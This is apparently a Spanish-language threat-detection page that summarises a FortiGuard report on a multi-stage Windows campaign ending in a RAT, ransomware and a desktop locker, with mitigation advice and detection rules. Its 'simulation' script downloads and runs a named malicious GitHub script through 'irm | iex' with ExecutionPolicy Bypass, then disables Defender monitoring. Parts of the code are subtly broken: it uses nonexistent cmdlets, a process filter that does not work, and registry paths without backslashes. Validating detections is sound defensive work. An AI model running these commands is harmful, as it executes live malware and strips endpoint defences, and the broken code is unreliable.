Dentro de una Operación de Malware para Windows en Múltiples Etapas
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
FortiGuard Labs identificó una cadena de intrusión multi-etapa en Windows que comienza con un archivo LNK malicioso entregado dentro de un archivo comprimido. El acceso directo lanza un cargador inicial de PowerShell que descarga guiones desde GitHub y luego entrega el control a un orquestador de VBScript ofuscado. El flujo de trabajo luego intenta debilitar las defensas del endpoint al deshabilitar Microsoft Defender, desplegar la utilidad Defendnot y preparar tanto Amnesia RAT como el ransomware Hakuna Matata. La operación concluye dejando caer un componente WinLocker que bloquea el escritorio para interrumpir la recuperación y presionar a las víctimas.
Investigación
Los investigadores reconstruyeron el camino de ejecución desde la etapa de PowerShell activada por LNK hasta un VBScript que reconstruye cargas útiles en memoria, culminando en el despliegue de ransomware y un comportamiento de bloqueo del escritorio. Las medidas defensivas fueron eludidas a través de ediciones específicas del registro y mediante la inyección de un DLL Defendnot en Taskmgr.exe. Se implementó persistencia usando una combinación de entradas de claves Run y artefactos de la carpeta de inicio para reactivar la cadena después de iniciar sesión.
Mitigación
Monitoree cambios sospechosos a nivel de políticas en el registro bajo HKLMSOFTWAREPoliciesMicrosoftWindows Defender y HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies. Bloquee la salida a URLs conocidas malignas de GitHub y Dropbox usadas para la preparación, y alerte sobre patrones de descarga y ejecución de PowerShell que se originen en inicios de LNK. Refuerce la lista de aplicaciones permitidas y ajuste los controles de ejecución de PowerShell para reducir el acceso inicial basado en guiones.
Respuesta
Si se detecta, aísle el endpoint, restaure la configuración del registro relacionada con Defender a un estado conocido bueno, y elimine archivos maliciosos y entradas de persistencia. Busque procesos activos de Amnesia RAT y actividad de red asociada, y valide si ocurrió la ejecución de ransomware. Realice un triage forense completo para dimensionar el impacto y erradicar restos, luego recupere los sistemas desde backups limpios donde sea posible.
Flujo de Ataque
Detecciones
Proceso Sospechoso Utiliza una URL en la Línea de Comandos (via cmdline)
Ver
Desactivar Monitorización en Tiempo Real de Windows Defender y Otros Cambios de Preferencias (via cmdline)
Ver
IOCs (HashSha256) para detectar: Dentro de una Campaña de Malware Multi-etapa de Windows
Ver
Actividad de Red Maliciosa y C2 vía GitHub, Dropbox, Telegram [Conexión de Red de Windows]
Ver
Ejecución de PowerShell en Campaña de Malware de Windows [Windows Powershell]
Ver
Ejecución de PowerShell y CMD con Señuelo Install.exe [Creación de Procesos de Windows]
Ver
Ejecución de Simulación
Requisito Previo: El Chequeo Previo de Telemetría & Línea Base debe haber sido aprobado.
Racional: Esta sección detalla la ejecución precisa de la técnica adversaria (TTP) diseñada para disparar la regla de detección. Los comandos y el relato DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico incorrecto.
-
Narrativa de Ataque & Comandos:
Un adversario que ha logrado un acceso inicial en el endpoint desea descargar y ejecutar una carga útil maliciosa de PowerShell mientras evade la política de ejecución predeterminada. UtilizanInvoke‑Expression(iex) combinado conInvoke‑WebRequest(irm) para extraer un guión desde una URL cruda remota de GitHub, ejecutándolo bajo-ExecutionPolicy Bypass. Después de establecer persistencia, desactivan el monitoreo en tiempo real de Windows Defender para evitar la detección de cargas útiles posteriores. Estos pasos generan directamente las cadenas de la línea de comandos que la regla Sigma observa. -
Script de Prueba de Regresión:
# -------------------------------------------------------------- # Paso 1 – Ejecutar guión remoto con ExecutionPolicy Bypass # -------------------------------------------------------------- $maliciousUrl = "https://github.com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira.ps1" powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm '$maliciousUrl' | iex" # -------------------------------------------------------------- # Paso 2 – Desactivar el monitoreo en tiempo real de Windows Defender # -------------------------------------------------------------- # Desactivar la protección en tiempo real Disable-MpPreference -DisableRealtimeMonitoring $true # Agregar un camino de exclusión (simulado) Add-MpPreference -ExclusionPath "C:TempExcludeFolder" -
Comandos de Limpieza:
# Re-activar el monitoreo en tiempo real de Windows Defender Enable-MpPreference -DisableRealtimeMonitoring $false # Eliminar el camino de exclusión (si existe) Remove-MpPreference -ExclusionPath "C:TempExcludeFolder" -ErrorAction SilentlyContinue # Detener cualquier proceso de PowerShell persistente iniciado por el guión Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'kira.ps1'} | Stop-Process -Force